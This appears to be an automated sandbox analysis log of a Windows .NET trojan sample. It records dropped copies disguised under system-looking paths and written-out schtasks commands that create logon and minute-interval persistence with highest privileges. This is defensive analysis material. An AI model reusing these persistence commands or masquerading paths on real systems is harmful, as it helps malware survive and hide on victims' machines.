Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000003169000.00000004.00000800.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000026.00000002.2457019815.000000000273A000.00000004.00000800.00020000.00000000.sdmp, System.exe, 00000028.00000002.2520255820.00000000030D2000.00000004.00000800.00020000.00000000.sdmp, xMLVfJVxhYAkoCJ.exe, 00000029.00000002.2635446252.0000000002C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe\:Zone.Identifier:$DATA Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Windows\IdentityCRL\production\51c080b3bf3cc1 Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Code function: 0_2_00007FFD34793565 0_2_00007FFD34793565
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Code function: 0_2_00007FFD3479CAA9 0_2_00007FFD3479CAA9
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Code function: 5_2_00007FFD34773565 5_2_00007FFD34773565
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Code function: 5_2_00007FFD3477CAA9 5_2_00007FFD3477CAA9
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Code function: 5_2_00007FFD3477CF28 5_2_00007FFD3477CF28
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 29_2_00007FFD34763565 29_2_00007FFD34763565
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 29_2_00007FFD3476CAA9 29_2_00007FFD3476CAA9
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 30_2_00007FFD34773565 30_2_00007FFD34773565
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 30_2_00007FFD3477CAA9 30_2_00007FFD3477CAA9
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 30_2_00007FFD3477CF28 30_2_00007FFD3477CF28
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 30_2_00007FFD34785BD3 30_2_00007FFD34785BD3
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 31_2_00007FFD347A5BD3 31_2_00007FFD347A5BD3
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 31_2_00007FFD34793565 31_2_00007FFD34793565
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 31_2_00007FFD3479CFCF 31_2_00007FFD3479CFCF
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347A2C60 32_2_00007FFD347A2C60
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347ABD8B 32_2_00007FFD347ABD8B
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347A102F 32_2_00007FFD347A102F
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347B27A0 32_2_00007FFD347B27A0
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347AC920 32_2_00007FFD347AC920
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347AD120 32_2_00007FFD347AD120
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347A3350 32_2_00007FFD347A3350
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347ADBA8 32_2_00007FFD347ADBA8
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347AC737 32_2_00007FFD347AC737
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347B2730 32_2_00007FFD347B2730
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347AB031 32_2_00007FFD347AB031
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347AB010 32_2_00007FFD347AB010
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 32_2_00007FFD347AC270 32_2_00007FFD347AC270
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 33_2_00007FFD34773565 33_2_00007FFD34773565
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 33_2_00007FFD3477CAA9 33_2_00007FFD3477CAA9
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 33_2_00007FFD3477CF28 33_2_00007FFD3477CF28
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 33_2_00007FFD34785BD3 33_2_00007FFD34785BD3
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 34_2_00007FFD34783565 34_2_00007FFD34783565
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 34_2_00007FFD3478CAA9 34_2_00007FFD3478CAA9
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 34_2_00007FFD3478CF38 34_2_00007FFD3478CF38
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 35_2_00007FFD34783565 35_2_00007FFD34783565
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 35_2_00007FFD3478CAA9 35_2_00007FFD3478CAA9
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 35_2_00007FFD3478CF38 35_2_00007FFD3478CF38
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 35_2_00007FFD34795BD3 35_2_00007FFD34795BD3
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B2678 38_2_00007FFD347B2678
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347C1030 38_2_00007FFD347C1030
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B1F8B 38_2_00007FFD347B1F8B
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347CAF92 38_2_00007FFD347CAF92
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B70B0 38_2_00007FFD347B70B0
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B516D 38_2_00007FFD347B516D
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347CA25D 38_2_00007FFD347CA25D
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B62C1 38_2_00007FFD347B62C1
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347BC3FB 38_2_00007FFD347BC3FB
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B3B68 38_2_00007FFD347B3B68
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347C7EDD 38_2_00007FFD347C7EDD
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B46D8 38_2_00007FFD347B46D8
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B4849 38_2_00007FFD347B4849
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B0AF5 38_2_00007FFD347B0AF5
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347A3565 38_2_00007FFD347A3565
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347ACF38 38_2_00007FFD347ACF38
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Code function: 38_2_00007FFD347B5E60 38_2_00007FFD347B5E60
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 40_2_00007FFD34785E60 40_2_00007FFD34785E60
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 40_2_00007FFD3479A25D 40_2_00007FFD3479A25D
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 40_2_00007FFD34785DFA 40_2_00007FFD34785DFA
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 40_2_00007FFD34788FD3 40_2_00007FFD34788FD3
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 40_2_00007FFD34773565 40_2_00007FFD34773565
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Code function: 40_2_00007FFD3477CF28 40_2_00007FFD3477CF28
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD34785E60 41_2_00007FFD34785E60
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD34785DFA 41_2_00007FFD34785DFA
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD34788FD3 41_2_00007FFD34788FD3
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD34773565 41_2_00007FFD34773565
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD3477CF28 41_2_00007FFD3477CF28
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD3479A25D 41_2_00007FFD3479A25D
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD3479AF92 41_2_00007FFD3479AF92
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Code function: 41_2_00007FFD34799CE9 41_2_00007FFD34799CE9
Source: XPC5PMKegV.exe, 00000000.00000000.2103762152.0000000000B66000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamelibcrypto$ vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename( vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2128952828.0000000002E61000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMessageOnStart.dclib4 vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2129458279.0000000012E6F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename$ vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2131937856.000000001B870000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2131899690.000000001B850000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename( vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2133223177.000000001C08B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2133223177.000000001C08B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exej% vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2131854370.000000001B830000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilename$ vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe, 00000000.00000002.2128895681.0000000002D40000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMessageOnStart.dclib4 vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe Binary or memory string: OriginalFilenamelibcrypto$ vs XPC5PMKegV.exe
Source: XPC5PMKegV.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.cs Cryptographic APIs: 'CreateDecryptor'
Source: XPC5PMKegV.exe, shHQreaeBMM9abhddjw.cs Cryptographic APIs: 'CreateDecryptor'
Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.cs Cryptographic APIs: 'TransformBlock'
Source: XPC5PMKegV.exe, DluwITU8fwv2qNUbyp5.cs Cryptographic APIs: 'TransformFinalBlock'
Source: classification engine Classification label: mal100.troj.evad.winEXE@42/29@0/1
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Mutant created: NULL
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\865a90ef9879085fae9371076bbb0e052cb82423
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7136:120:WilError_03
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File created: C:\Users\user\AppData\Local\Temp\bNV1sCNsUH Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat"
Source: XPC5PMKegV.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: XPC5PMKegV.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\XPC5PMKegV.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: XPC5PMKegV.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\XPC5PMKegV.exe File read: C:\Users\user\Desktop\XPC5PMKegV.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\XPC5PMKegV.exe "C:\Users\user\Desktop\XPC5PMKegV.exe"
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 9 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 5 /tr "'C:\Recovery\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
Source: unknown Process created: C:\Recovery\xMLVfJVxhYAkoCJ.exe C:\Recovery\xMLVfJVxhYAkoCJ.exe
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Windows\IdentityCRL\production\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 6 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 5 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\System.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 10 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 6 /tr "'C:\Users\Default\NetHood\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJ" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "xMLVfJVxhYAkoCJx" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown Process created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
Source: unknown Process created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft.NET\System.exe "C:\Program Files (x86)\microsoft.net\System.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft.NET\System.exe "C:\Program Files (x86)\microsoft.net\System.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
Source: unknown Process created: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe "C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe"
Source: unknown Process created: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe "C:\Program Files (x86)\windows defender\StartMenuExperienceHost.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft.NET\System.exe "C:\Program Files (x86)\microsoft.net\System.exe"
Source: unknown Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe"
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yrs7rIEeUp.bat" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe "C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe" Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Section loaded: cryptbase.dll Jump to behavior
